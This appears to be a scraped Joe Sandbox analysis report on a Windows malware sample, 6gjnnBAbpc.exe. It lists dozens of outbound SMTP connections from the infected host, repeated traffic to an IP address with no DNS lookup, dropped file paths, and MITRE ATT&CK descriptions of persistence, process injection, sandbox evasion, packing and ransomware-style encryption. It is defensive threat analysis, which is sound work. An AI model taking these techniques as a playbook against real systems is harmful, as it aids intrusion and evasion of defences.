Source: global traffic	TCP traffic: 192.168.2.5:60553 -> 104.26.7.17:25
Source: global traffic	TCP traffic: 192.168.2.5:60605 -> 211.13.204.3:25
Source: global traffic	TCP traffic: 192.168.2.5:60827 -> 199.59.243.223:25
Source: global traffic	TCP traffic: 192.168.2.5:60980 -> 3.19.116.195:25
Source: global traffic	TCP traffic: 192.168.2.5:61129 -> 208.100.26.245:25
Source: global traffic	TCP traffic: 192.168.2.5:61151 -> 162.241.233.114:25
Source: global traffic	TCP traffic: 192.168.2.5:61438 -> 52.86.6.113:25
Source: global traffic	TCP traffic: 192.168.2.5:61933 -> 18.197.121.220:25
Source: global traffic	TCP traffic: 192.168.2.5:61934 -> 59.106.13.169:25
Source: global traffic	TCP traffic: 192.168.2.5:62008 -> 104.21.8.75:25
Source: global traffic	TCP traffic: 192.168.2.5:62075 -> 76.74.184.61:25
Source: global traffic	TCP traffic: 192.168.2.5:62171 -> 79.96.32.254:25
Source: global traffic	TCP traffic: 192.168.2.5:62285 -> 34.224.10.110:25
Source: global traffic	TCP traffic: 192.168.2.5:62645 -> 107.165.223.27:25
Source: global traffic	TCP traffic: 192.168.2.5:63571 -> 78.46.224.133:25
Source: global traffic	TCP traffic: 192.168.2.5:63600 -> 219.94.128.87:25
Source: global traffic	TCP traffic: 192.168.2.5:63983 -> 185.230.63.186:25
Source: global traffic	TCP traffic: 192.168.2.5:64391 -> 93.187.206.66:25
Source: global traffic	TCP traffic: 192.168.2.5:64604 -> 185.22.232.175:25
Source: global traffic	TCP traffic: 192.168.2.5:64659 -> 75.2.70.75:25
Source: global traffic	TCP traffic: 192.168.2.5:64701 -> 195.128.140.29:25
Source: global traffic	TCP traffic: 192.168.2.5:64717 -> 202.94.166.30:25
Source: global traffic	TCP traffic: 192.168.2.5:1383 -> 213.142.131.159:25
Source: global traffic	TCP traffic: 192.168.2.5:1648 -> 203.137.75.45:25
Source: global traffic	TCP traffic: 192.168.2.5:1932 -> 219.94.129.97:25
Source: global traffic	TCP traffic: 192.168.2.5:2329 -> 202.172.28.89:25
Source: global traffic	TCP traffic: 192.168.2.5:2459 -> 49.212.235.59:25
Source: global traffic	TCP traffic: 192.168.2.5:2533 -> 89.107.169.125:25
Source: global traffic	TCP traffic: 192.168.2.5:2615 -> 18.119.154.66:25
Source: global traffic	TCP traffic: 192.168.2.5:2635 -> 133.125.38.187:25
Source: global traffic	TCP traffic: 192.168.2.5:3423 -> 153.122.170.15:25
Source: global traffic	TCP traffic: 192.168.2.5:4124 -> 108.170.12.50:25
Source: global traffic	TCP traffic: 192.168.2.5:4670 -> 213.175.217.57:25
Source: global traffic	TCP traffic: 192.168.2.5:5715 -> 164.90.244.158:25
Source: global traffic	TCP traffic: 192.168.2.5:7942 -> 193.70.68.254:25
Source: global traffic	TCP traffic: 192.168.2.5:8017 -> 103.4.16.43:25
Source: global traffic	TCP traffic: 192.168.2.5:8139 -> 148.72.176.26:25
Source: global traffic	TCP traffic: 192.168.2.5:8994 -> 193.107.88.74:25
Source: global traffic	TCP traffic: 192.168.2.5:9003 -> 85.128.55.51:25
Source: global traffic	TCP traffic: 192.168.2.5:10707 -> 185.106.129.180:25
Source: global traffic	TCP traffic: 192.168.2.5:12204 -> 221.132.33.88:25
Source: global traffic	TCP traffic: 192.168.2.5:12280 -> 76.223.35.103:25
Source: global traffic	TCP traffic: 192.168.2.5:12840 -> 52.128.23.153:25
Source: global traffic	TCP traffic: 192.168.2.5:13518 -> 107.180.58.31:25
Source: global traffic	TCP traffic: 192.168.2.5:13522 -> 13.56.33.8:25
Source: global traffic	TCP traffic: 192.168.2.5:14273 -> 35.186.238.101:25
Source: global traffic	TCP traffic: 192.168.2.5:14502 -> 91.201.52.102:25
Source: global traffic	TCP traffic: 192.168.2.5:14532 -> 3.130.253.23:25
Source: global traffic	TCP traffic: 192.168.2.5:15518 -> 174.129.25.170:25
Source: global traffic	TCP traffic: 192.168.2.5:16056 -> 35.230.155.43:25
Source: global traffic	TCP traffic: 192.168.2.5:17176 -> 203.210.102.34:25
Source: global traffic	TCP traffic: 192.168.2.5:18736 -> 219.94.128.216:25
Source: global traffic	TCP traffic: 192.168.2.5:21951 -> 13.248.169.48:25
Source: global traffic	TCP traffic: 192.168.2.5:22178 -> 59.106.13.181:25
Source: global traffic	TCP traffic: 192.168.2.5:22195 -> 212.44.102.57:25
Source: global traffic	TCP traffic: 192.168.2.5:22197 -> 69.46.30.77:25
Source: global traffic	TCP traffic: 192.168.2.5:22207 -> 136.243.147.81:25
Source: global traffic	TCP traffic: 192.168.2.5:22216 -> 89.221.250.3:25
Source: global traffic	TCP traffic: 192.168.2.5:22241 -> 54.209.32.212:25
Source: global traffic	TCP traffic: 192.168.2.5:22453 -> 104.21.92.170:25
Source: global traffic	TCP traffic: 192.168.2.5:23689 -> 151.101.2.132:25
Source: global traffic	TCP traffic: 192.168.2.5:27216 -> 185.76.64.25:25
Source: global traffic	TCP traffic: 192.168.2.5:27222 -> 198.199.101.195:25
Source: global traffic	TCP traffic: 192.168.2.5:27264 -> 52.71.57.184:25
Source: global traffic	TCP traffic: 192.168.2.5:27295 -> 202.53.77.146:25
Source: global traffic	TCP traffic: 192.168.2.5:27364 -> 141.193.213.20:25
Source: global traffic	TCP traffic: 192.168.2.5:27374 -> 46.19.218.80:25
Source: global traffic	TCP traffic: 192.168.2.5:27409 -> 104.21.41.152:25

Source: unknown	TCP traffic detected without corresponding DNS query: 198.1.81.28
Source: unknown	TCP traffic detected without corresponding DNS query: 211.13.196.162
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 198.1.81.28
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73
Source: unknown	TCP traffic detected without corresponding DNS query: 153.120.34.73

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 6gjnnBAbpc.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\89dad5d484a9f889a3a8dfca823edc3e_d06ed635-68f6-4e9a-955c-4899f5f57b9a

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\c5d8393293ce2ba62f117b2c2d55bc3e_d06ed635-68f6-4e9a-955c-4899f5f57b9a

C:\Users\user\pigalicapi.exe

C:\Users\user\pigalicapi.exe:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Windows Analysis Report
6gjnnBAbpc.exe

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre